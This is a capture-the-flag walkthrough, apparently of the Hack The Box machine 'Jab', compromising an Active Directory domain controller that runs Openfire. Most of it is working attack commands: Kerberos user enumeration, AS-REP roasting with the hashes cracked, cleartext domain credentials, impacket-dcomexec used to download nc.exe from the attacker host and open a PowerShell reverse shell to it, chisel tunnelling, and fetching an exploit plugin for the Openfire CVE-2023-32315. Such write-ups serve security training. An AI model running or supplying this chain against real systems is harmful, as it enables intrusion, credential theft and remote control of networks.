
Nmap Results
Show Nmap Scan Results
# Nmap 7.94SVN scan initiated Tue Feb 27 12:31:36 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
Not shown: 65503 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-27 17:32:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-02-27T17:34:46+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-27T17:34:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 2w1nsbkqd
| xmpp:
| version: 1.0
|_ capabilities:
|_ssl-date: TLS randomness does not represent time
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5262/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 1luyjkdr8f
| xmpp:
| version: 1.0
|_ capabilities:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5275/tcp open jabber
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: qj9t3bq52
| xmpp:
| version: 1.0
|_ capabilities:
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:00 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:05 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:06 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:11 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
7777/tcp open socks5 (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-27T17:34:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 13.23 ms 10.10.14.1
2 13.28 ms 10.10.11.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 12:34:47 2024 -- 1 IP address (1 host up) scanned in 191.67 seconds
We can see the references to DC01.jab.htb and jab.htb in the nmap output. Let's go ahead and get those added to our /etc/hosts file.
echo '10.10.11.4 DC01.jab.htb jab.htb' | sudo tee -a /etc/hostsService Enumeration
TCP/53

TCP/445

TCP/88
Let's see if we can enumerate any valid usernames using Kerberos pre-authentication requests.

cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt | sed -e 's/[A-Z]/[a-z]/g' | sort -u > kerberos_users.txt`Generate the username list
kerbrute userenum -d jab.htb --dc 10.10.11.4 -t 1000 -o kerbrute.log ./kerberos_users.txtReduce the number of threads according to your specifications



grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list.txtGenerate a list of usernames to test for AS-REP roasting
impacket-GetNPUsers -usersfile as_rep_list.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aaThe user 'mlowe' appears to be AS-REP roastable
echo '$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aa' > as_rep_hash
john --wordlist=rockyou.txt as_rep_hashLet's see if we can crack it using 'rockyou.txt'

TCP/5222
I'm not familiar with the steps needed to enumerate the Jabber attack surface, but looking at the nmap output, it seems the Jabber (XMPP) server has bound to multiple ports including tcp/5223, tcp/5262, tcp/5263, tcp/5275, tcp/5276, tcp/7070, tcp/7443.
Let's start by asking Google for some information.
Researching Jabber Enumeration


Lots of good information here
Connect with a Jabber Client
The article referenced above uses the pidgin XMPP client, so that's what we'll use.
sudo apt install -y pidgin









Exporting the User List
There isn't a clear way of exporting the usernames from this user search function, so we'll have to get creative.






grep -oE '[A-Za-z0-9]{1,}\@jab.htb' jabber.log | grep -v 'ben@jab.htb' | sort -u > jabber_emails.txt
cat jabber_emails.txt | cut -d '@' -f 1 > jabber_usernames.txtGet all emails from the log and filter out my own username, then create a username list
AS-REP Roast with the New List
diff as_rep_list.txt jabber_usernames.txt | grep '>' | awk -v FS=' ' '{print $2}' > jabber_as_rep.txtWe're going to AS-REP roast again, but only on names that are unique to Jabber
impacket-GetNPUsers -usersfile jabber_as_rep.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
john --wordlist=rockyou.txt as_rep_hashes.txt
Adding the Jabber Account







jmontgomery credential and see who has access to what.TCP/3269
ldapdomaindump -u 'JAB.HTB\jmontgomery' -p 'Midnight_121' -o ldd ldaps://dc01.jab.htb:3269
open ldd/domain_users_by_group.html




# Check help output for usage
impacket-dcomexec -himpacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.14.181'
Exploit
DCOM Exec to Reverse Shell
cp /usr/share/windows-resources/binaries/nc.exe .
Copy the on-system 'nc.exe' binary to the current directory
sudo python3 -m http.server 80Host 'nc.exe' over HTTP
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'certutil -f -urlcache -split http://10.10.14.181/nc.exe C:\Windows\Tasks\nc.exe'Use DCOM to download 'nc.exe' to the target

sudo rlwrap nc -lnvp 443Start a TCP listener
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\nc.exe 10.10.14.181 443 -e powershell.exe'Use DCOM to run a PowerShell reverse shell over the 'nc.exe' socket

Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 1/1/1970 12:00:00 AM
WindowsProductId :
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
BiosCharacteristics :
BiosBIOSVersion :
BiosBuildNumber :
BiosCaption :
BiosCodeSet :
BiosCurrentLanguage :
BiosDescription :
BiosEmbeddedControllerMajorVersion :
BiosEmbeddedControllerMinorVersion :
BiosFirmwareType :
BiosIdentificationCode :
BiosInstallableLanguages :
BiosInstallDate :
BiosLanguageEdition :
BiosListOfLanguages :
BiosManufacturer :
BiosName :
BiosOtherTargetOS :
BiosPrimaryBIOS :
BiosReleaseDate :
BiosSeralNumber :
BiosSMBIOSBIOSVersion :
BiosSMBIOSMajorVersion :
BiosSMBIOSMinorVersion :
BiosSMBIOSPresent :
BiosSoftwareElementState :
BiosStatus :
BiosSystemBiosMajorVersion :
BiosSystemBiosMinorVersion :
BiosTargetOperatingSystem :
BiosVersion :
CsAdminPasswordStatus :
CsAutomaticManagedPagefile :
CsAutomaticResetBootOption :
CsAutomaticResetCapability :
CsBootOptionOnLimit :
CsBootOptionOnWatchDog :
CsBootROMSupported :
CsBootStatus :
CsBootupState :
CsCaption :
CsChassisBootupState :
CsChassisSKUNumber :
CsCurrentTimeZone :
CsDaylightInEffect :
CsDescription :
CsDNSHostName :
CsDomain :
CsDomainRole :
CsEnableDaylightSavingsTime :
CsFrontPanelResetStatus :
CsHypervisorPresent :
CsInfraredSupported :
CsInitialLoadInfo :
CsInstallDate :
CsKeyboardPasswordStatus :
CsLastLoadInfo :
CsManufacturer :
CsModel :
CsName :
CsNetworkAdapters :
CsNetworkServerModeEnabled :
CsNumberOfLogicalProcessors :
CsNumberOfProcessors :
CsProcessors :
CsOEMStringArray :
CsPartOfDomain :
CsPauseAfterReset :
CsPCSystemType :
CsPCSystemTypeEx :
CsPowerManagementCapabilities :
CsPowerManagementSupported :
CsPowerOnPasswordStatus :
CsPowerState :
CsPowerSupplyState :
CsPrimaryOwnerContact :
CsPrimaryOwnerName :
CsResetCapability :
CsResetCount :
CsResetLimit :
CsRoles :
CsStatus :
CsSupportContactDescription :
CsSystemFamily :
CsSystemSKUNumber :
CsSystemType :
CsThermalState :
CsTotalPhysicalMemory :
CsPhyicallyInstalledMemory :
CsUserName :
CsWakeUpType :
CsWorkgroup :
OsName :
OsType :
OsOperatingSystemSKU :
OsVersion :
OsCSDVersion :
OsBuildNumber :
OsHotFixes :
OsBootDevice :
OsSystemDevice :
OsSystemDirectory :
OsSystemDrive :
OsWindowsDirectory :
OsCountryCode :
OsCurrentTimeZone :
OsLocaleID :
OsLocale :
OsLocalDateTime :
OsLastBootUpTime :
OsUptime :
OsBuildType :
OsCodeSet :
OsDataExecutionPreventionAvailable :
OsDataExecutionPrevention32BitApplications :
OsDataExecutionPreventionDrivers :
OsDataExecutionPreventionSupportPolicy :
OsDebug :
OsDistributed :
OsEncryptionLevel :
OsForegroundApplicationBoost :
OsTotalVisibleMemorySize :
OsFreePhysicalMemory :
OsTotalVirtualMemorySize :
OsFreeVirtualMemory :
OsInUseVirtualMemory :
OsTotalSwapSpaceSize :
OsSizeStoredInPagingFiles :
OsFreeSpaceInPagingFiles :
OsPagingFiles :
OsHardwareAbstractionLayer :
OsInstallDate :
OsManufacturer :
OsMaxNumberOfProcesses :
OsMaxProcessMemorySize :
OsMuiLanguages :
OsNumberOfLicensedUsers :
OsNumberOfProcesses :
OsNumberOfUsers :
OsOrganization :
OsArchitecture :
OsLanguage :
OsProductSuites :
OsOtherTypeDescription :
OsPAEEnabled :
OsPortableOperatingSystem :
OsPrimary :
OsProductType :
OsRegisteredUser :
OsSerialNumber :
OsServicePackMajorVersion :
OsServicePackMinorVersion :
OsStatus :
OsSuites :
OsServerLevel :
KeyboardLayout :
TimeZone : (UTC-05:00) Eastern Time (US & Canada)
LogonServer :
PowerPlatformRole : Desktop
HyperVisorPresent :
HyperVRequirementDataExecutionPreventionAvailable :
HyperVRequirementSecondLevelAddressTranslation :
HyperVRequirementVirtualizationFirmwareEnabled :
HyperVRequirementVMMonitorModeExtensions :
DeviceGuardSmartStatus : Off
DeviceGuardRequiredSecurityProperties :
DeviceGuardAvailableSecurityProperties :
DeviceGuardSecurityServicesConfigured :
DeviceGuardSecurityServicesRunning :
DeviceGuardCodeIntegrityPolicyEnforcementStatus :
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :
Current User
USER INFORMATION
----------------
User Name SID
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users Alias S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Users and Groups
See ldapdomaindump data.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.4
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
Open Ports
127.0.0.1:9090 0.0.0.0:0 LISTENING 3192
127.0.0.1:9091 0.0.0.0:0 LISTENING 3192
Interesting Files
C:\Program Files\Openfire\conf\openfire.xml
<adminConsole>
<!-- Disable either port by setting the value to -1 -->
<port>9090</port>
<securePort>9091</securePort>
<interface>127.0.0.1</interface>
</adminConsole>
Privilege Escalation
In the post-exploit enumeration steps, we found a couple of ports listening internally on tcp/9090 and tcp/9091 and we can further see that it's associated with process ID 3076. We can see these TCP ports referenced as the Openfire admin console ports in openfire.xml.


Let's transfer chisel.exe to the target, so we can forward those ports.

I just used the download_chisel function referenced in my notes above to download both chisel and chisel.exe.
sudo python3 -m http.server 80Start a web server to host chisel.exe over HTTP
iwr -useb http://10.10.14.181/chisel.exe -o C:\Windows\Tasks\chisel.exeDownload chisel.exe in our reverse shell
sudo ./chisel server --port 8081 --reverse &Start the chisel server in the background on Kali
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\chisel.exe client 10.10.14.181:8081 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091'
Use DCOM to remotely start the process









wget https://github.com/miko550/CVE-2023-32315/raw/main/openfire-management-tool-plugin.jar -O plugin.jar




sudo rlwrap nc -lnvp 443Start a TCP listener


Flags
User
cbe0287bba2a7a8b60575f9fbc09ee44
Root
97c1833cc7ea11ba52044b004bb51f1b



